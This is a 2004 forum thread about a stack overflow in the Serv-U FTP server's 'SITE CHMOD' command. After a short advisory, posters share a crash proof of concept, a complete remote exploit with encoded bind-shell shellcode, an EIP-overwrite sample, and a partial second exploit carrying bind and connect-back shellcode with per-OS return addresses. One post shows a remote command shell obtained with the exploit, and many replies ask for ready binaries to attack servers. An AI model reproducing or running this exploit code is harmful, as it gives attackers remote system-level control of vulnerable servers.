Serv-u Stack Overflow Vunlnerablity

pita

Jan 25 2004, 10:45 PM

CODE

Serv-U Ftp Server Long Filename Stack Overflow Vunlnerablity

Application: Serv-U

Affected Versions: All versions prior 4.2 (include 4.1.0.11)

Vendor: RhinoSoft (http://www.rhinosoft.com
http://www.serv-u.com)

URL: http://www.0x557.org/release/servu.txt

Vunlnerablity:

An internal memory buffer may be overrun while handling "site chmod" command
with a filename containg excessive data. This condition may be exploited by
attackers to ultimately execute instructions with the priviledges of the serv-u
process, typically administator or system.

Details:

While exectuing chmod on a nonexistent file, serv-u will call sprintf to
construct response string. And the code is like
sprintf(dst, "%s: No such file or directory.", filename);

The length of dst buffer is only 256 bytes.If a long filename was sent,
serv-u will crash.

A writable directory is needed to exploit this vulerablity.By overwriting SEH,
we have created proof-of-concept exploit successfully on win2k/xp.

Solution:

Upgrade to servu 5.0.

Credits:

kkqq <kkqq@0x557.org> has indenpendently discovered this vulerablity.
All members of SST (http://www.0x557.org).
lgx and eyas.
Rob Beckers for indentifing and fixing this vulerablity.

About SST:

Do we really exist?

to test this just do:
site chmod 777 aaaaa (more than 256 'a' )
as u can see servu is crashing .

seppel18

Jan 25 2004, 11:05 PM

When comes the shell-sploit?

pita

Jan 25 2004, 11:26 PM

here is a proof of concept written by me:

CODE

/*
servupoc.c
Serv-U Ftp Server Long Filename Stack Overflow Vunlnerablity
Only Proof of Concept by Pita.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <io.h>

#pragma lib <ws2_32.lib>

//Bad buffer
char buff[]="SITE CHMOD 777 "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

int main(int argc, char** argv)
{
WSADATA wsdata;
int sock;
struct sockaddr_in target;
char user[26]="";
char pass[26]="";

printf("Serv-U Ftp Server Long Filename Stack Overflow Vunlnerablity\n");
printf("Proof of concept by Pita\n");

if (argc < 5)
{
printf("%s <ip> <port> <user> <pass>\n",argv[0]);
exit(1);
}

WSAStartup(MAKEWORD(2,0),&wsdata);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port=htons(atoi(argv[2]));

snprintf(user,26, "USER %s\r\n", argv[3]);
snprintf(pass,26, "PASS %s\r\n", argv[4]);

connect(sock,(struct sockaddr *)&target, sizeof(target));
send(sock,user,sizeof(user)-1,0);
send(sock,pass,sizeof(pass)-1,0);
send(sock,buff,sizeof(buff),0);
sleep(2000); // sleep a little
printf("Crashed!\n");

WSACleanup();
closesocket(sock);
return 0;
}

this will only crash the server and u need login, pass and a writable directory...
and a serv-u ftp server of course

Nexcess

Jan 26 2004, 01:00 AM

QUOTE

This condition may be exploited by
attackers to ultimately execute instructions with the priviledges of the serv-u
process, typically administator or system.

Forget crashing it, someone point me in the direction of cmd shell

Reaper527

Jan 26 2004, 01:01 AM

QUOTE

Linking...
suftp.obj : error LNK2019: unresolved external symbol __imp__closesocket@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__WSACleanup@0 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol _sleep referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__send@16 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__connect@12 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol _snprintf referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__htons@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__inet_addr@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__socket@12 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__WSAStartup@8 referenced in function _main
Release/strokiller.exe : fatal error LNK1120: 10 unresolved externals

if i figure anything out i'll post tips to help anyone else having problems. btw great work on the POC

pita

Jan 26 2004, 01:02 AM

compile with lcc

Nexcess

Jan 26 2004, 01:27 AM

If anyone has the remote root / shell version please pass it along, im not a fan of killing remote ftps for no reason

Thanks for the POC anyway though

-Nexy

redcorp

Jan 26 2004, 06:38 AM

we want shell code we want shell code

DDosing Serv-u servers is kinda stupid but good work anyway

JaANDniET

Jan 26 2004, 07:19 AM

hehe really needs something instead of dameware sploits

thx m8

hdlgp

Jan 26 2004, 08:43 AM

I try it.

jead99

Jan 26 2004, 09:59 AM

Heh, gonna try this

Thanks for sharing the info

Copkill

Jan 26 2004, 11:36 AM

I have try it but the server is not crash ;(

XtrA

Jan 26 2004, 01:44 PM

i have tryed it on a 4.0 server version and its still up..

pita

Jan 26 2004, 02:16 PM

remember u need a writable directory...

TheOther

Jan 26 2004, 02:43 PM

mmmm a buffer overrun? Lets wait till there is someone who can put a shell in it.

POC looks great, not tested yet. But why should I crash stros?

gsicht

Jan 26 2004, 03:33 PM

hm..., the eax register is overridden by the string but i can't achieve the eip. *grml*

maybe only it's a dosable vulnerability

isaiah

Jan 26 2004, 03:38 PM

I bet someone already relased this but not sharing and thank god i use serv-u 5.0

ScriptGod

Jan 26 2004, 04:55 PM

QUOTE (TheOther @ Jan 26 2004, 02:43 PM)

mmmm a buffer overrun? Lets wait till there is someone who can put a shell in it.

POC looks great, not tested yet. But why should I crash stros?

well this bug is an simple buffer overflow bug. so you can execute code. it's possible to get a shell through this bug.

Divx_dude

Jan 26 2004, 05:25 PM

this exploit is LAME

flashb4ck

Jan 26 2004, 05:31 PM

is there no way to exploit without to have write access because on the most server u have only read axx ?!=!?

Viporizer

Jan 26 2004, 05:42 PM

Tryed it on my private server, and it worked. But now i have make it a server again, so it wasn't that smart of me...

pita

Jan 26 2004, 05:57 PM

here the exploit with shell

CODE

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq 0x557 org
* exp coded by mslug safechina net
* Jan 25 2004
*/

/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION -
strlen(ERR_HEADER))

// bindshell shellcode from www.cnhonker.org
#define PORT 53
#define PORT_OFFSET 176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
"\xd6\x19\x02\x75" //call_ebx = 0x750219d6
"\x33\xc0" //below: xor eax, eax
"\xb0\x1c" //mov al, 1c
"\x03\xd8" //add ebx, eax
"\xc6\x03\x90"; //mov byte ptr [ebx], 90

int main(int argc, char **argv)
{
WSADATA wsa;
unsigned short port;
int ftpsock, ret;
char recv_buf[1000];
unsigned long ip;
unsigned char buf[100];

printf("*******************************************\n");
printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
printf("* Vul discovered by kkqq 0x557 org *\n");
printf("* Coded by mslug safechina net *\n");
printf("*******************************************\n");
printf("\n");

if(argc<6) {
printf("serv.exe <host> <port> <user> <password> <path>\n");
return 0;
}

WSAStartup(MAKEWORD(2,2), &wsa);

port = htons(PORT)^(USHORT)0x9999;
memcpy(&bdshellcode[PORT_OFFSET], &port, 2);

ftpsock = connect_tcp(argv[1], atoi(argv[2]));
if(ftpsock < 0) {
printf("[-] Connection refused\n");
return 0;
}
ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

recv_buf[ret] = 0;
printf("%s", recv_buf);

sprintf(buf, "USER %s\r\n", argv[3]);
send(ftpsock, buf, strlen(buf), 0);

ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

recv_buf[ret] = 0;
printf("%s", recv_buf);

sprintf(buf, "PASS %s\r\n", argv[4]);
send(ftpsock, buf, strlen(buf), 0);

ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);

sprintf(buf, "CWD %s\r\n", argv[5]);
send(ftpsock, buf, strlen(buf), 0);

ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);

memset(evil_chmod, 0x90, sizeof(evil_chmod));
memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20],
bdshellcode, strlen(bdshellcode));

send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

printf("[+] Shellcode sent\n");
printf("[+] Now nc to port 53\n");

closesocket(ftpsock);
WSACleanup();

return 0;
}

int connect_tcp(char *host, int port)
{
struct hostent *rhost;
struct sockaddr_in sin_rhost;
unsigned long ip_rhost;
int sock;

memset(&sin_rhost, 0, sizeof(sin_rhost));

sin_rhost.sin_family = AF_INET;
sin_rhost.sin_port = htons(port);
ip_rhost = inet_addr(host);
if(ip_rhost==INADDR_NONE) {
rhost = gethostbyname(host);
if(rhost==0) return -1;
ip_rhost = *(unsigned long*)rhost->h_addr;
}

sin_rhost.sin_addr.s_addr = ip_rhost;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock<0) {
return -1;
}

if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
return -1;
}

return sock;
}

x1`

Jan 26 2004, 06:01 PM

nice one m8 did u test it ? also which compiler did u use

BlackBoard

Jan 26 2004, 06:03 PM

serv-u 4.2 site chmod long_file_name stack overflow exp

$ gcc servu.c
servu.c:19: error: syntax error before string constant
servu.c: In function `main':
servu.c:93: error: `bdshellcode' undeclared (first use in this function)
servu.c:93: error: (Each undeclared identifier is reported only once
servu.c:93: error: for each function it appears in.)
servu.c:131: error: syntax error before ']' token
servu.c:132: error: syntax error before ']' token
servu.c:176:2: warning: no newline at end of file

TheOther

Jan 26 2004, 06:15 PM

I use ms CC++:

Compiling...
servExploit.c
c:\servexploit.c(18) : error C2143: syntax error : missing ')' before 'string'
c:\servexploit.c(18) : error C2143: syntax error : missing '{' before 'string'
c:\servexploit.c(18) : error C2059: syntax error : '<Unknown>'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(92) : error C2065: 'bdshellcode' : undeclared identifier
c:\servexploit.c(92) : error C2109: subscript requires array or pointer type
c:\servexploit.c(92) : error C2102: '&' requires l-value
c:\servexploit.c(92) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(92) : error C2198: 'memcpy' : too few actual parameters
c:\servexploit.c(95) : warning C4013: 'connect_tcp' undefined; assuming extern returning int
c:\servexploit.c(130) : error C2059: syntax error : ']'
c:\servexploit.c(131) : error C2143: syntax error : missing ')' before ']'
c:\servexploit.c(132) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(132) : warning C4047: 'function' : 'const char *' differs in levels of indirection from 'int '
c:\servexploit.c(132) : warning C4024: 'strlen' : different types for formal and actual parameter 1

easternerd

Jan 26 2004, 06:27 PM

Yes the cj team released it..
but they told us not to get it
to open

...

DeathDriver

Jan 26 2004, 06:35 PM

i had no problems with compiling. i did it with borlad c++builderX

the only think i had to do was interting "int connect_tcp(char *host, int port);"

above

"int main(int argc, char **argv)"

the result is:

CODE

//...
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
"\xd6\x19\x02\x75" //call_ebx = 0x750219d6
"\x33\xc0" //below: xor eax, eax
"\xb0\x1c" //mov al, 1c
"\x03\xd8" //add ebx, eax
"\xc6\x03\x90"; //mov byte ptr [ebx], 90

int connect_tcp(char *host, int port);

int main(int argc, char **argv)
{
WSADATA wsa;
unsigned short port;
int ftpsock, ret;
//...

after compiling i tried it with my servu server, but she server just shut down. may be i have do disable my firewall. or i did an other mistake...

gsicht

Jan 26 2004, 07:20 PM

QUOTE

this exploit is LAME

it's a dos exploit! pita coded this exploit to show that there's a stack overflow in servu. thanks to pita
i just found the place where the eip is. i'll try to code a working exploit. you can help me if you will.

here is an example how to overwrite the eip

CODE

/*
* the XXXX in buff[] is the return address
* gsicht
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>

char buff[] = "SITE CHMOD 777 "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAXXXXAAAAAAAAAAAA"
"AAAAAAAAAAAAAAA\r\n";

int main(int argc, char *argv[])
{

struct sockaddr_in target;
struct sockaddr_in test;
int s, i;
char buffer[1000];
char user[50];
char pass[50];
char empf_buffer[1024];

sprintf(user,"USER %s\r\n",argv[3]);
sprintf(pass,"PASS %s\r\n",argv[4]);

printf("\n----- hier ist die topic -----\n");

if(argc < 4)
{
printf("\nUsage:\t%s <host> <port> <user> <pass>\n\n",argv[0]);
exit(-1);
}

s=socket(AF_INET,SOCK_STREAM,0);

target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr.s_addr = inet_addr(argv[1]);

printf("\n- connecting...\n");

if (connect (s, (struct sockaddr *) &target, sizeof(target)) == -1)
{
printf(" could not connect!\n");
exit(-1);
}
printf(" connected\n");

printf("- user\t%s\n",argv[3]);
printf("- pass\t%s\n",argv[4]);
write(s,user,strlen(user));
sleep(1);
write(s,pass,strlen(pass));
sleep(1);

i=recv(s,empf_buffer,sizeof(empf_buffer),0);
empf_buffer[i]='\0';

if(strstr(empf_buffer,"230")!=NULL )
{
printf(" user logged in\n");
sleep(1);
}
else
{
printf(" wrong username or password!\n");
exit(-1);
}

printf("- sending %d bytes\n",strlen(buff));
write(s,buff,strlen(buff));
sleep(1);
printf("- done\n");
close(s);

return 0;
}

gsicht

Jan 26 2004, 07:23 PM

oh, i didn't saw the exploit from 0x557

forget my post

temp

Jan 26 2004, 07:38 PM

works great..

Z:\servu\Release>cpp1 192.168.0.10 21 test test /
*******************************************
* Serv-U 4.2 site chmod stack overflow exp*
* Vul discovered by kkqq 0x557 org *
* Coded by mslug safechina net *
*******************************************

220 Serv-U FTP Server v4.1 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
250 Directory changed to /
[+] Shellcode sent
[+] Now nc to port 53

Z:\servu\Release>z:\nc 192.168.0.10 53

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\>

SkyRaVeR

Jan 26 2004, 07:39 PM

th@nx mate ! nice work ! tried this one but no success

even with shellcode servu just crashes and doesn't open local shell

too bad !

greetz, sky

Milka

Jan 26 2004, 07:57 PM

to bad this only works for serv-u where you DO have admin rights... otherwize.. a lot of servers would be (filtered)

temp

Jan 26 2004, 07:59 PM

you don't need admin rights..
just write access

the

Jan 26 2004, 08:25 PM

@ temp
which compiler did u user dude ??
greetz

Nexcess

Jan 26 2004, 08:33 PM

QUOTE (the @ Jan 26 2004, 08:25 PM)

@ temp
which compiler did u user dude ??
greetz

it wasnt borland.. or at least i had no luck with it

Oh well, maybe someone will save me the trouble of finding
the right compiler and post the binary

AlessandroIT

Jan 26 2004, 08:42 PM

Hey m8...If sm1 succesfully Code This Exploit (with shell reverse), can we Post iT to Download section? There is only a DoS exploit 4 serv-u...It is bad

TheOther

Jan 26 2004, 08:49 PM

Nice one Temp!!

But the idea of a forum is to help eachother out.

Could you share your knowledge with us?

BlackBoard

Jan 26 2004, 08:52 PM

I got still problems with compiling, i tried it with microsoft visual c++ 6.0, cygwin and lcc. Can someone tell me how i can compile it correctly. Thank You

x1`

Jan 26 2004, 09:06 PM

temp can u post your working version in download section i cant compile it either

Planquadrat

Jan 26 2004, 09:08 PM

here is anotherone for serv-u 3.x and 4.x i have succesfull comiled it with MS C++

QUOTE

/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright © 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* :    + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug found by kkqq kkqq@0x557.org ***
*    : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage    : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32")

// for bind shellcode
#define BIND_OFFSET 91

// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88

#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133    // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "1.0"

struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"}, //for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"}, //wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"}, //wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"}, //user32.dll jmp ebx addr
{0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"}, //setupapi.dll jmp ebx addr
{0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"}, //setupapi.dll jmp ebx addr
{0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"}, //setupapi.dll jmp ebx addr
{0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;

unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];

// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";

// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";

// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";

// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";

void usage(char *p)
{
int i;
printf( "Usage:\t%s\t<-i ip> <-t type>\n"
"\t\t[-u user] [-p pass] [-d dir]\n"
"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
"[type]:\n" , p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
